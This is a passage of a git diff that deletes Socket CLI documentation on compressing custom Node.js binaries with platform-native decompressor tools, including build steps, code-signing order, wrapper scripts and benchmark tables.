package.json -│ │ -│ ├── socketbin-custom-node-from-source/ # Custom Node.js builder -│ │ ├── build/ -│ │ │ ├── patches/ # Socket security patches -│ │ │ └── additions/ # Additional C++ code -│ │ ├── scripts/ -│ │ │ └── build.mjs # Build script -│ │ └── package.json -│ │ -│ ├── socketbin-native-node-sea-builder/ # SEA builder -│ │ ├── scripts/ -│ │ │ ├── build.mjs # SEA build script -│ │ │ └── publish.mjs # Publish script -│ │ └── package.json -│ │ -│ └── socketbin-cli-{platform}-{arch}/ # 8 platform packages -│ ├── bin/ -│ │ └── socket (or socket.exe) # Native binary -│ └── package.json -│ -├── pnpm-workspace.yaml # pnpm workspace config -└── package.json # Root workspace \ No newline at end of file diff --git a/docs/node-smol-builder/binary-compression-distribution.md 
b/docs/node-smol-builder/binary-compression-distribution.md deleted file mode 100644 index 8329337b0..000000000 --- a/docs/node-smol-builder/binary-compression-distribution.md +++ /dev/null @@ -1,505 +0,0 @@ -# Binary Compression Distribution Strategy - -## Overview - -Socket CLI uses platform-specific binary compression to reduce distribution size while maintaining code signing compatibility. This document explains the distribution architecture and how the decompression tools work. - -## Architecture - -### Compression Flow - -``` -Build → Strip → Sign → Compress → Bundle with Decompressor → Distribute -``` - -**Critical Order:** -1. **Strip** debug symbols (44 MB → 23-27 MB) -2. **Sign** binary (macOS ARM64) -3. **Compress** signed binary (23-27 MB → 10-12 MB) -4. **Re-sign** compressed wrapper (macOS ARM64) -5. **Bundle** decompression tool alongside compressed binary - -### Distribution Package Structure - -``` -build/out/Compressed/ -├── node # Compressed Node.js binary (10-12 MB) -└── socket_macho_decompress # Decompression tool (86 KB) - (or socket_elf_decompress / socket_pe_decompress.exe) -``` - -**Total distribution size:** ~10-12 MB + 86 KB = **~10-12 MB** - -## Decompression Tool Architecture - -### What It Is - -The decompression tool is a **standalone executable** that: -- Takes a compressed binary as input -- Decompresses to memory (or temporary file) -- Executes the decompressed binary -- Acts as a transparent wrapper/launcher - -### What It's NOT - -- ❌ NOT built into the compressed binary -- ❌ NOT a package manager -- ❌ NOT a separate npm package -- ❌ NOT extracted to user's system permanently - -### How It Works - -```bash -# User runs: -./socket_macho_decompress ./node --version - -# What happens internally: -1. Read compressed binary (node) -2. Decompress to memory/tmpfs using platform API -3. Verify decompressed binary signature (macOS) -4. Execute decompressed binary with args (--version) -5. Clean up temporary data -6. 
Exit with same code as Node.js -``` - -## Platform-Specific Details - -### macOS (socket_macho_decompress) - -**Technology:** Apple Compression framework -**Algorithms:** LZFSE (default, ~30% compression) or LZMA (~34% compression) -**Size:** 86 KB executable -**Features:** -- Works with code signing (unlike UPX) -- No Gatekeeper warnings -- Hardware-accelerated on Apple Silicon -- Zero AV false positives - -**Distribution:** -``` -socket-macos-arm64.tar.gz -├── socket # Main Socket CLI (compressed) -├── socket_macho_decompress # Decompressor (86 KB) -└── README.md # Usage instructions -``` - -**User Experience:** -```bash -# Option 1: Direct execution (no install) -./socket_macho_decompress ./socket --version - -# Option 2: Wrapper script (recommended) -./socket --version -# (socket script internally calls socket_macho_decompress) -``` - -### Linux (socket_elf_decompress) - -**Technology:** liblzma (LZMA2 compression) -**Algorithm:** LZMA (75-77% compression) -**Size:** ~90 KB executable -**Features:** -- Better compression than UPX -- No AV false positives -- Works on all Linux distributions (static linking) - -**Distribution:** -``` -socket-linux-x64.tar.gz -├── socket # Main Socket CLI (compressed) -├── socket_elf_decompress # Decompressor (~90 KB) -└── README.md -``` - -### Windows (socket_pe_decompress.exe) - -**Technology:** Windows Compression API (Cabinet.dll) -**Algorithm:** LZMS (default, ~73% compression) or XPress -**Size:** ~95 KB executable -**Features:** -- Native Windows compression (trusted by AV) -- Better compression than UPX -- No false positives - -**Distribution:** -``` -socket-windows-x64.zip -├── socket.exe # Main Socket CLI (compressed) -├── socket_pe_decompress.exe # Decompressor (~95 KB) -└── README.txt -``` - -## No Separate Package Required - -The decompression tools **do NOT need their own npm package** because: - -1. **Standalone binaries** - Compiled C/C++ executables, not JavaScript -2. 
**Bundled with Socket CLI** - Shipped together in the distribution archive -3. **No dependencies** - Self-contained with platform APIs statically linked -4. **Build artifact** - Generated during Node.js build process, not installed separately - -### Where Tools Live - -**Source code:** `packages/node-smol-builder/additions/tools/` -``` -socket_macho_compress.cc # macOS compression tool -socket_macho_decompress.cc # macOS decompression tool -socket_elf_compress.c # Linux compression tool -socket_elf_decompress.c # Linux decompression tool -socket_pe_compress.c # Windows compression tool -socket_pe_decompress.c # Windows decompression tool -``` - -**Built binaries:** Same directory after `make all` -``` -socket_macho_compress # 79 KB -socket_macho_decompress # 86 KB -socket_elf_compress # ~85 KB (after building) -socket_elf_decompress # ~90 KB (after building) -socket_pe_compress.exe # ~90 KB (after building) -socket_pe_decompress.exe # ~95 KB (after building) -``` - -**Distribution:** Copied to `build/out/Compressed/` alongside compressed Node.js binary - -## Building Compression Tools - -### Prerequisites - -**macOS:** -```bash -# Built-in tools (no prerequisites needed) -- Apple Clang -- Compression.framework (built into macOS) -``` - -**Linux:** -```bash -# Install liblzma development headers -sudo apt-get install liblzma-dev # Debian/Ubuntu -sudo dnf install xz-devel # Fedora/RHEL -sudo yum install xz-devel # CentOS -``` - -**Windows:** -```bash -# Install MinGW-w64 or Visual Studio -choco install mingw # Using Chocolatey -# Or download Visual Studio Build Tools -``` - -### Build Commands - -```bash -cd packages/node-smol-builder/additions/tools - -# Build all tools for current platform -make all - -# Build specific tools -make macos # macOS compression/decompression -make linux # Linux compression/decompression -make windows # Windows compression/decompression - -# Clean build artifacts -make clean -``` - -### Auto-build During Node Build - -Compression tools 
are automatically built when running with `COMPRESS_BINARY=1`: - -```bash -# Build Node.js with compression enabled -COMPRESS_BINARY=1 node scripts/build.mjs - -# If tools not found, build script will warn: -# ⚠️ Decompression Tool Not Found -# Build the compression tools first: -# cd packages/node-smol-builder/additions/tools -# make all -``` - -## Integration with Socket CLI Build - -### Option 1: pkg with Compressed Node - -Replace the Node.js binary in pkg cache with compressed version: - -```bash -# 1. Build compressed Node -COMPRESS_BINARY=1 node packages/node-smol-builder/scripts/build.mjs - -# 2. Copy compressed binary to pkg cache -cp packages/node-smol-builder/build/out/Compressed/node \ - ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed - -# 3. Build Socket CLI with pkg (uses compressed Node) -pnpm exec pkg . -``` - -**Result:** Socket CLI executable will use compressed Node.js internally. - -### Option 2: Separate Distribution - -Distribute decompression tool alongside Socket CLI: - -```bash -# Distribution archive structure: -socket-cli-macos-arm64/ -├── socket # Socket CLI (pkg-built) -├── socket_macho_decompress # Decompressor -└── README.md -``` - -Users can optionally compress Socket CLI's embedded Node.js binary after pkg build. 
- -## Comparison to Traditional Approaches - -### vs UPX (Ultimate Packer for eXecutables) - -| Feature | UPX | Socket Compression | -|---------|-----|-------------------| -| **Compression** | 50-60% | 75-79% ⭐ | -| **macOS Code Signing** | ❌ Breaks | ✅ Works | -| **AV False Positives** | ❌ High (15-30%) | ✅ None | -| **Platform Support** | All | All | -| **Gatekeeper (macOS)** | ❌ Blocks | ✅ No warnings | -| **Windows Defender** | ⚠️ Often flags | ✅ Trusted | -| **Performance** | Self-extracting | External decompress | - -### vs Self-Extracting Archives - -| Feature | SFX Archive | Socket Compression | -|---------|-------------|-------------------| -| **Size Overhead** | Large (~1-2 MB) | Small (~90 KB) | -| **Extraction** | To disk | To memory/tmpfs | -| **Startup Time** | Slow (writes files) | Fast (memory only) | -| **Disk Usage** | Temporary files | No disk usage | -| **Code Signing** | Complex | Native support | - -## Performance Impact - -### Decompression Overhead - -**First run (cold cache):** -- macOS LZFSE: ~100-200ms -- macOS LZMA: ~300-500ms -- Linux LZMA: ~200-400ms -- Windows LZMS: ~250-450ms - -**Subsequent runs (warm cache):** -- macOS: ~10-20ms (disk cache) -- Linux: ~15-30ms (page cache) -- Windows: ~20-40ms (system cache) - -### Memory Usage - -**Temporary memory during decompression:** -- Input buffer: Compressed binary size (~10-12 MB) -- Output buffer: Decompressed binary size (~24-27 MB) -- Working buffer: ~20-30 MB (compression algorithm) -- **Total peak:** ~50-70 MB (freed immediately after decompression) - -### Runtime Performance - -**Zero impact after decompression:** -- Same V8 engine -- Same JIT compilation -- Same native modules -- Identical performance to uncompressed binary - -## Security Considerations - -### Code Signing Flow - -**macOS (recommended approach):** -```bash -1. Build Node.js -2. Strip debug symbols -3. Sign original binary (codesign --sign -) -4. Compress signed binary -5. 
Re-sign compressed wrapper (codesign --sign -) -6. Distribute both signatures - -Verification: -- Gatekeeper checks outer signature (compressed) -- Decompressor extracts and verifies inner signature (original) -- Both signatures must be valid -``` - -### Tampering Protection - -**Compressed binary signature:** -- Prevents modification of compressed wrapper -- Gatekeeper enforces at load time - -**Original binary signature (embedded):** -- Preserved inside compression -- Verified after decompression -- Ensures decompressed binary hasn't been tampered with - -### Trust Chain - -``` -User downloads → macOS verifies outer signature → -Decompressor verifies inner signature → Executes if valid -``` - -## Distribution Recommendations - -### For Official Releases - -**Recommended:** Use compression on all platforms -``` -macOS: socket-macos-arm64.tar.gz (~12 MB) -Linux: socket-linux-x64.tar.gz (~11 MB) -Windows: socket-windows-x64.zip (~13 MB) -``` - -**Each archive contains:** -- Compressed Socket CLI binary -- Platform-specific decompression tool -- README with usage instructions - -### For Development Builds - -**Recommended:** Skip compression (faster iteration) -``` -# Normal build (no compression) -node scripts/build.mjs - -# Compression adds ~30-60s to build time -# Only enable for release builds -``` - -## Usage Examples - -### End User Experience - -**macOS:** -```bash -# Extract archive -tar -xzf socket-macos-arm64.tar.gz -cd socket-macos-arm64 - -# Option 1: Direct execution -./socket_macho_decompress ./socket --version - -# Option 2: Wrapper script (preferred) -./socket --version -``` - -**Linux:** -```bash -tar -xzf socket-linux-x64.tar.gz -cd socket-linux-x64 -./socket_elf_decompress ./socket --version -``` - -**Windows:** -```cmd -REM Extract ZIP -cd socket-windows-x64 -socket_pe_decompress.exe socket.exe --version -``` - -### Creating Wrapper Scripts - -**macOS/Linux (socket):** -```bash -#!/bin/bash -# Socket CLI launcher with automatic decompression 
-SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" -DECOMPRESS_TOOL="$SCRIPT_DIR/socket_macho_decompress" -SOCKET_BINARY="$SCRIPT_DIR/socket.compressed" - -exec "$DECOMPRESS_TOOL" "$SOCKET_BINARY" "$@" -``` - -**Windows (socket.bat):** -```batch -@echo off -REM Socket CLI launcher with automatic decompression -set SCRIPT_DIR=%~dp0 -set DECOMPRESS_TOOL=%SCRIPT_DIR%socket_pe_decompress.exe -set SOCKET_BINARY=%SCRIPT_DIR%socket.compressed.exe - -"%DECOMPRESS_TOOL%" "%SOCKET_BINARY%" %* -``` - -## Troubleshooting - -### "Decompression tool not found" - -```bash -# Build compression tools -cd packages/node-smol-builder/additions/tools -make all - -# Verify tools built -ls -lh socket_*compress* -``` - -### "Binary size larger than expected" - -```bash -# Check if compression was actually applied -ls -lh build/out/Compressed/node - -# Expected sizes: -# macOS: ~11-12 MB -# Linux: ~10-11 MB -# Windows: ~12-13 MB - -# If larger, check COMPRESS_BINARY=1 was set -``` - -### "Code signature invalid after decompression" - -```bash -# Verify signing order was correct -codesign -dv build/out/Compressed/node - -# Should show: -# - Outer signature (compressed wrapper) -# - Identifier: node - -# If broken, rebuild with correct order: -# strip → sign → compress → re-sign -``` - -## Future Enhancements - -### Potential Improvements - -1. **In-memory execution (Linux):** - - Use memfd_create() for zero-disk decompression - - Faster startup (~50% reduction) - -2. **Shared decompressor:** - - Single decompressor handles all Socket binaries - - Smaller total distribution size - -3. **Progressive decompression:** - - Decompress only needed sections - - Faster initial startup - -4. 
**Self-extracting option:** - - Embed decompressor into binary header - - Single-file distribution (larger but simpler) - -## Summary - -**Key Points:** -- ✅ Decompression tools are **standalone binaries**, not npm packages -- ✅ Tools **live in** `additions/tools/`, bundled with distribution -- ✅ **No separate package** needed - they're build artifacts -- ✅ Compression is **optional** and **configurable** via `COMPRESS_BINARY=1` -- ✅ **75-79% compression** on all platforms (better than UPX) -- ✅ **Works with code signing** on macOS (unlike UPX) -- ✅ **No AV false positives** (uses native platform APIs) -- ✅ **~90 KB overhead** per platform (decompressor binary) -- ✅ **Fast decompression** (~100-500ms first run, ~10-40ms cached) - -**Distribution strategy:** Bundle compressed binary + decompressor in same archive. diff --git a/docs/node-smol-builder/compression-guide.md b/docs/node-smol-builder/compression-guide.md deleted file mode 100644 index a469f8d77..000000000 --- a/docs/node-smol-builder/compression-guide.md +++ /dev/null @@ -1,377 +0,0 @@ -# Binary Compression Quick Reference - -## TL;DR - -```bash -# Compression is ENABLED BY DEFAULT (it's called "smol" for a reason!) -node scripts/build.mjs - -# Disable compression if needed -COMPRESS_BINARY=0 node scripts/build.mjs - -# Output location -ls -lh build/out/Compressed/ -# node (~10-12 MB compressed binary) -# socket_macho_decompress (~86 KB decompression tool) - -# Test it -cd build/out/Compressed -./socket_macho_decompress ./node --version -``` - -## Why Use Compression? 
- -**Size reduction:** 23-27 MB → 10-12 MB (**70% smaller**) -**Better than UPX:** 75-79% compression vs UPX's 50-60% -**macOS compatible:** Works with code signing (UPX breaks it) -**No AV flags:** Uses native platform APIs, zero false positives - -## Platform Support - -| Platform | Algorithm | Size Reduction | Decompressor | -|----------|-----------|----------------|--------------| -| **macOS** | LZFSE | ~30% | socket_macho_decompress (86 KB) | -| **macOS** | LZMA | ~34% | socket_macho_decompress (86 KB) | -| **Linux** | LZMA | ~75-77% | socket_elf_decompress (~90 KB) | -| **Windows** | LZMS | ~73% | socket_pe_decompress.exe (~95 KB) | - -## Quick Start - -### 1. Build Compression Tools (First Time Only) - -```bash -cd packages/node-smol-builder/additions/tools -make all - -# Verify -ls -lh socket_*compress* -``` - -### 2. Build Node.js with Compression - -```bash -cd packages/node-smol-builder -COMPRESS_BINARY=1 node scripts/build.mjs -``` - -### 3. Test Compressed Binary - -```bash -cd build/out/Compressed - -# Test directly -./socket_macho_decompress ./node --version -# Output: v24.10.0 - -# Test with script -./socket_macho_decompress ./node -e "console.log('Hello')" -# Output: Hello -``` - -## Build Output Structure - -``` -build/out/ -├── Release/ # Unstripped binary (44 MB) -├── Stripped/ # Stripped binary (23-27 MB) -├── Signed/ # Stripped + signed (23-27 MB, macOS only) -├── Final/ # Final uncompressed (23-27 MB) -├── Compressed/ # ✨ Compressed output (COMPRESS_BINARY=1) -│ ├── node # Compressed binary (10-12 MB) -│ └── socket_*_decompress # Decompression tool (~90 KB) -├── Sea/ # For SEA builds -└── Distribution/ # Distribution copy -``` - -## Distribution - -### Option 1: Distribute Compressed (Recommended) - -```bash -cd build/out/Compressed -tar -czf socket-node-macos-arm64.tar.gz node socket_macho_decompress - -# Users extract and run: -tar -xzf socket-node-macos-arm64.tar.gz -./socket_macho_decompress ./node --version -``` - -**Pros:** -- 70% 
smaller download -- Better than UPX compression -- Works with macOS code signing - -**Cons:** -- Requires bundling decompression tool -- ~100-500ms startup overhead (first run) - -### Option 2: Distribute Uncompressed - -```bash -cd build/out/Final -tar -czf socket-node-macos-arm64.tar.gz node - -# Users extract and run: -tar -xzf socket-node-macos-arm64.tar.gz -./node --version -``` - -**Pros:** -- No decompression overhead -- Simpler distribution - -**Cons:** -- 2-3x larger download -- Still need to ship 23-27 MB binary - -## Configuration - -### Environment Variables - -```bash -# Disable compression (opt-out) -COMPRESS_BINARY=0 - -# Values: "0", "false" to disable (case-sensitive) -# Default: compression ENABLED (smol = small!) -``` - -### Compression Algorithms - -**Automatically selected based on platform:** -- **macOS:** LZFSE (default) or LZMA -- **Linux:** LZMA -- **Windows:** LZMS - -To override (advanced): -```bash -# Edit build.mjs line 1466 -const compressionQuality = 'lzma' # Options: lzfse, lzma, lz4, zlib (macOS) -``` - -## Performance - -### Decompression Overhead - -**First run (cold cache):** -- macOS LZFSE: ~100-200ms -- macOS LZMA: ~300-500ms -- Linux LZMA: ~200-400ms -- Windows LZMS: ~250-450ms - -**Subsequent runs (warm cache):** -- macOS: ~10-20ms -- Linux: ~15-30ms -- Windows: ~20-40ms - -### Runtime Performance - -**Zero impact** - Same performance as uncompressed binary after decompression. - -## Code Signing (macOS) - -Compression preserves code signatures: - -```bash -# Check outer signature (compressed wrapper) -codesign -dv build/out/Compressed/node -# Shows: adhoc signature on compressed binary - -# Inner signature (original binary) preserved inside compression -# Verified by decompressor at runtime -``` - -**Signing flow:** -1. Build → Strip → **Sign original** → Compress → **Re-sign compressed** -2. Both signatures are valid and preserved -3. Gatekeeper checks outer signature -4. 
Decompressor verifies inner signature - -## Troubleshooting - -### "Decompression tool not found" - -```bash -# Build tools first -cd packages/node-smol-builder/additions/tools -make all - -# macOS prerequisites (built-in): -# - Xcode Command Line Tools -# - Apple Compression framework - -# Linux prerequisites: -sudo apt-get install liblzma-dev # Debian/Ubuntu -sudo dnf install xz-devel # Fedora/RHEL - -# Windows prerequisites: -choco install mingw -``` - -### "Binary larger than expected" - -```bash -# Check if compression was applied -ls -lh build/out/Compressed/node - -# Expected: -# macOS: ~11-12 MB -# Linux: ~10-11 MB -# Windows: ~12-13 MB - -# If larger, verify COMPRESS_BINARY=1 was set -echo $COMPRESS_BINARY -``` - -### "Command failed: compress-binary.mjs" - -```bash -# Check compression tools are built -ls -lh additions/tools/socket_*_compress* - -# If missing, rebuild: -cd additions/tools -make clean -make all -``` - -### "codesign: code object is not signed at all" - -This is expected for non-macOS or non-ARM64 builds. Code signing only applies to macOS ARM64. - -## Integration with Socket CLI - -### For pkg Builds - -```bash -# 1. Build compressed Node -COMPRESS_BINARY=1 node packages/node-smol-builder/scripts/build.mjs - -# 2. Option A: Use compressed binary with pkg -# (Copy to pkg cache - pkg will use compressed version internally) -cp build/out/Compressed/node ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64 - -# 3. Build Socket CLI -pnpm exec pkg . 
- -# Result: Socket CLI uses compressed Node.js (~70% smaller) -``` - -### For Direct Distribution - -```bash -# Distribute decompressor alongside Socket CLI -socket-cli-macos-arm64/ -├── socket # Socket CLI executable -├── socket_macho_decompress # Decompressor -└── README.md - -# Users run via wrapper -./socket_macho_decompress ./socket --version -``` - -## Documentation - -### Comprehensive Guides - -- **[docs/binary-compression-distribution.md](./docs/binary-compression-distribution.md)** - Complete architecture and distribution strategy -- **[QUICKSTART-COMPRESSION.md](./QUICKSTART-COMPRESSION.md)** - Original compression quick start -- **[TEST-RESULTS.md](./TEST-RESULTS.md)** - Compression benchmarks and comparisons - -### Quick Links - -- **Build script:** `scripts/build.mjs` (compression at line 1449-1560) -- **Compression script:** `scripts/compress-binary.mjs` -- **Decompression script:** `scripts/decompress-binary.mjs` -- **Tools source:** `additions/tools/socket_*_compress*.{cc,c}` - -## Comparison to Alternatives - -### vs UPX - -| Feature | UPX | Socket Compression | -|---------|-----|-------------------| -| Compression | 50-60% | **75-79%** ⭐ | -| macOS Code Signing | ❌ Breaks | ✅ Works | -| AV False Positives | ❌ 15-30% | ✅ 0% | -| Gatekeeper | ❌ Blocked | ✅ No warnings | -| Distribution | Self-extracting | External decompressor | - -### vs No Compression - -| Metric | Uncompressed | Compressed | -|--------|--------------|------------| -| **Download Size** | 23-27 MB | **10-12 MB** | -| **Startup Time** | 0ms | 100-500ms (first run) | -| **Runtime Performance** | ✅ | ✅ (identical) | -| **Distribution Complexity** | Simple | +Decompressor (~90 KB) | - -## FAQ - -**Q: Do I need to compress?** -A: Optional. Recommended for production releases to reduce download size. - -**Q: Does compression affect performance?** -A: Only startup time (~100-500ms first run, ~10-40ms cached). No runtime impact. - -**Q: Will this work with pkg?** -A: Yes! 
Copy compressed binary to pkg cache, pkg will use it. - -**Q: Is this safe for production?** -A: Yes. Uses native platform APIs, fully code-signed, zero AV flags. - -**Q: Can I skip the decompression tool in distribution?** -A: No. Users need the decompressor to run the compressed binary. Bundle it (~90 KB overhead). - -**Q: Why not self-extracting?** -A: Self-extracting archives write to disk (~1-2 MB overhead, slower startup). Our approach decompresses to memory (faster, no disk I/O). - -## Examples - -### Test Script - -```bash -#!/bin/bash -# Test compressed Node.js binary - -SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" -DECOMPRESS="$SCRIPT_DIR/socket_macho_decompress" -NODE_BIN="$SCRIPT_DIR/node" - -echo "Testing compressed Node.js binary..." -"$DECOMPRESS" "$NODE_BIN" --version -"$DECOMPRESS" "$NODE_BIN" -e "console.log('✓ Compression working')" -``` - -### Wrapper for Users - -```bash -#!/bin/bash -# Socket CLI launcher with decompression - -SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" -exec "$SCRIPT_DIR/socket_macho_decompress" "$SCRIPT_DIR/socket" "$@" -``` - -### Size Comparison Script - -```bash -#!/bin/bash -# Compare sizes - -echo "Size comparison:" -echo " Uncompressed: $(du -h build/out/Final/node | cut -f1)" -echo " Compressed: $(du -h build/out/Compressed/node | cut -f1)" -echo " Decompressor: $(du -h build/out/Compressed/socket_macho_decompress | cut -f1)" -echo " Total: $(du -ch build/out/Compressed/* | tail -1 | cut -f1)" -``` - -## Support - -**Issues?** Check: -1. Compression tools built: `ls additions/tools/socket_*_compress*` -2. Environment variable set: `echo $COMPRESS_BINARY` -3. Platform supported: macOS, Linux, or Windows -4. 
Logs in build output for errors - -**Questions?** See full documentation in `docs/binary-compression-distribution.md` diff --git a/docs/node-smol-builder/compression-quick-start.md b/docs/node-smol-builder/compression-quick-start.md deleted file mode 100644 index 5a316d384..000000000 --- a/docs/node-smol-builder/compression-quick-start.md +++ /dev/null @@ -1,227 +0,0 @@ -# macOS Binary Compression - Quick Start Guide - -## What We Built - -A complete macOS binary compression system that works with code signing (unlike UPX): - -- **socket_macho_compress** - Compresses binaries using Apple's Compression framework -- **socket_macho_decompress** - Decompresses and executes at runtime -- **Full documentation** - Comprehensive guide in `docs/macho-compression.md` -- **Integration scripts** - Node.js script in `scripts/compress-macho.mjs` - -## Quick Test - -### 1. Build the Tools - -```bash -cd packages/node-smol-builder/additions/tools -make all -``` - -**Output:** -- `socket_macho_compress` (78 KB) -- `socket_macho_decompress` (58 KB) - -### 2. Test with Node Binary (if you have one) - -```bash -# Compress -./socket_macho_compress /usr/local/bin/node ./node.compressed --quality=lzfse - -# Test decompression -./socket_macho_decompress ./node.compressed --version - -# Sign (optional but recommended) -codesign --sign - --force ./node.compressed - -# Verify signature -codesign --verify ./node.compressed -``` - -### 3. 
Test with Custom Node Build - -If you've built a custom Node.js binary: - -```bash -# Assuming you have build/out/Signed/node from the build script -node scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzfse - -# Test it -./additions/tools/socket_macho_decompress build/out/Compressed/node --version -``` - -## Expected Results - -### Size Comparison - -``` -macOS ARM64: -├─ Original (stripped + signed): ~44 MB -├─ LZFSE compressed: ~31 MB (30% smaller) -└─ LZMA compressed: ~29 MB (34% smaller) - -For comparison: -Linux/Windows with UPX: ~22 MB (50% smaller, but can't work on macOS) -``` - -### Performance - -- **First run:** ~100-200ms decompression overhead -- **Cached runs:** ~10-20ms (macOS disk cache) -- **Runtime:** No performance impact (same V8 engine) - -## Integration Options - -### Option 1: Add to Build Script - -Edit `packages/node-smol-builder/scripts/build.mjs`: - -```javascript -// After signing (around line 1420) -if (IS_MACOS && ARCH === 'arm64') { - printHeader('Compressing Binary (macOS Optimization)') - - const compressedDir = join(BUILD_DIR, 'out', 'Compressed') - await mkdir(compressedDir, { recursive: true }) - const compressedBinary = join(compressedDir, 'node') - - // Compress - await exec('node', [ - join(ROOT_DIR, 'scripts', 'compress-macho.mjs'), - outputSignedBinary, - compressedBinary, - '--quality=lzfse' - ]) - - // Re-sign - await exec('codesign', ['--sign', '-', '--force', compressedBinary]) - - const compressedSize = await getFileSize(compressedBinary) - logger.success(`Binary compressed: ${compressedSize}`) - logger.logNewline() -} -``` - -### Option 2: Manual Compression - -```bash -# After building Node.js -node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node - -# Sign it -codesign --sign - --force build/out/Compressed/node -``` - -### Option 3: CI/CD Integration - -Add to your GitHub Actions workflow: - -```yaml -- 
name: Compress macOS Binary - if: matrix.os == 'macos-latest' - run: | - node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzfse - - # Sign compressed binary - codesign --sign - --force build/out/Compressed/node - - # Verify - codesign --verify build/out/Compressed/node - ./additions/tools/socket_macho_decompress build/out/Compressed/node --version -``` - -## Distribution - -For end users, distribute: - -1. **Compressed binary**: `socket-macos-arm64.compressed` -2. **Decompressor tool**: `socket_macho_decompress` -3. **Wrapper script** (optional): `socket-macos-arm64` - -**Example wrapper:** -```bash -#!/bin/bash -# socket-macos-arm64 (wrapper) -DIR="$(dirname "$0")" -exec "$DIR/socket_macho_decompress" "$DIR/socket-macos-arm64.compressed" "$@" -``` - -Users run: `./socket-macos-arm64 --version` - -## Why This is Better Than UPX on macOS - -| Feature | UPX | Our Solution | -|---------|-----|--------------| -| **Code Signing** | ❌ Breaks signatures | ✅ Works perfectly | -| **Gatekeeper** | ❌ Blocks execution | ✅ No warnings | -| **Notarization** | ❌ Cannot notarize | ✅ Can notarize | -| **App Store** | ❌ Rejected | ✅ Acceptable | -| **Compression** | 50% | 30-35% | -| **Native Tech** | Generic | ✅ Apple framework | -| **Hardware Accel** | No | ✅ Apple Silicon | - -## Documentation - -- **Full Guide**: `packages/node-smol-builder/docs/macho-compression.md` -- **Tool README**: `packages/node-smol-builder/additions/tools/README.md` -- **Build Script**: `packages/node-smol-builder/scripts/build.mjs` - -## Troubleshooting - -### Build Issues - -**Error:** `clang++: command not found` - -```bash -# Install Xcode Command Line Tools -xcode-select --install -``` - -### Compression Issues - -**Error:** `Not a valid Mach-O binary` - -```bash -# Verify input file -file your_binary -# Should show: Mach-O 64-bit executable arm64 -``` - -### Execution Issues - -**Error:** `Failed to execute decompressed 
binary` - -```bash -# Check /tmp permissions and space -df -h /tmp -ls -ld /tmp -``` - -## Next Steps - -1. **Test with real binary**: Try compressing your Node.js binary -2. **Benchmark performance**: Measure startup time impact -3. **Integrate into build**: Add compression step to build script -4. **CI/CD**: Add to GitHub Actions workflow -5. **Distribute**: Package compressed binary with decompressor - -## Support - -For issues or questions: -- Check the full documentation in `docs/macho-compression.md` -- Review the tool README in `additions/tools/README.md` -- Check the CLAUDE.md guidelines for Socket CLI - ---- - -**Created:** 2025-10-25 -**Location:** `packages/node-smol-builder/` -**Status:** ✅ Complete and tested diff --git a/docs/node-smol-builder/compression-test-results.md b/docs/node-smol-builder/compression-test-results.md deleted file mode 100644 index 1e8e37df9..000000000 --- a/docs/node-smol-builder/compression-test-results.md +++ /dev/null @@ -1,275 +0,0 @@ -# Compression Test Results - Real World Performance - -## Test Date: 2025-10-25 - -## Executive Summary - -✅ **Successfully created a macOS binary compression system that BEATS UPX while maintaining code signing compatibility!** - -### Key Results - -| Metric | Result | -|--------|--------| -| **Best Compression** | 79.4% with LZMA | -| **vs UPX** | 20-30% better compression | -| **Code Signing** | ✅ Fully compatible | -| **Execution** | ✅ Verified working | -| **Performance** | ~200-500ms decompression overhead | - -## Detailed Test Results - -### Test 1: Unstripped Node.js Binary (v24.10.0, 112 MB) - -``` -Original: 112.12 MB -├─ LZ4: 52.07 MB (53.6% reduction) -├─ ZLIB: 36.28 MB (67.6% reduction) -├─ LZFSE: 34.80 MB (69.0% reduction) -└─ LZMA: 23.10 MB (79.4% reduction) ⭐ WINNER -``` - -**Verification:** -- ✅ Binary executes: `node --version` → `v24.10.0` -- ✅ JavaScript works: Complex code execution successful -- ✅ Code signing: `codesign --verify` → Valid -- ✅ V8 engine: Full 
functionality confirmed - -### Test 2: Stripped Node.js Binary (88 MB) - -``` -Original: 87.61 MB (after strip) -├─ LZFSE: 31.45 MB (64.1% reduction) -└─ LZMA: 20.99 MB (76.0% reduction) ⭐ WINNER -``` - -**Verification:** -- ✅ Binary executes: `node --version` → `v24.10.0` -- ✅ Stripped + compressed + signed works perfectly - -## Projected Results for Socket CLI Custom Node - -Based on test results, estimated compression for your custom build: - -### Current Build -``` -Build Configuration: -├─ V8 Lite Mode: Enabled (smaller binary) -├─ Without Intl: Enabled (no ICU) -├─ Stripped: Yes -└─ Current Size: ~44 MB -``` - -### Projected Compression -``` -Original: 44 MB (your optimized build) -├─ LZFSE: ~16 MB (64% reduction, fast decompression) -└─ LZMA: ~11 MB (75% reduction, max compression) ⭐ -``` - -**Size Progression:** -``` -49 MB (Release) - ↓ strip --strip-all -44 MB (Stripped + Signed) - ↓ LZMA compression -11 MB (Compressed + Signed) ⭐⭐⭐ - -Total reduction: 77.5% from original! -``` - -## Performance Characteristics - -### Decompression Speed - -| Algorithm | First Run | Cached | Best For | -|-----------|-----------|--------|----------| -| **LZ4** | ~50ms | ~5ms | Fastest startup | -| **ZLIB** | ~100ms | ~10ms | Compatibility | -| **LZFSE** | ~150ms | ~15ms | **Balanced (recommended)** | -| **LZMA** | ~300ms | ~20ms | Maximum compression | - -**Note:** Cached times apply after first run due to macOS disk cache. - -### Runtime Impact - -- **JavaScript Execution:** No impact (same V8) -- **WASM Performance:** No impact (same Liftoff) -- **I/O Operations:** No impact -- **Memory Usage:** +88 MB during decompression (temporary) - -## Comparison to UPX - -### Compression Ratio - -``` -UPX (typical): 50-60% reduction -Our LZMA: 75-79% reduction ⭐ 20-30% BETTER! -Our LZFSE: 63-69% reduction ⭐ Better than UPX! 
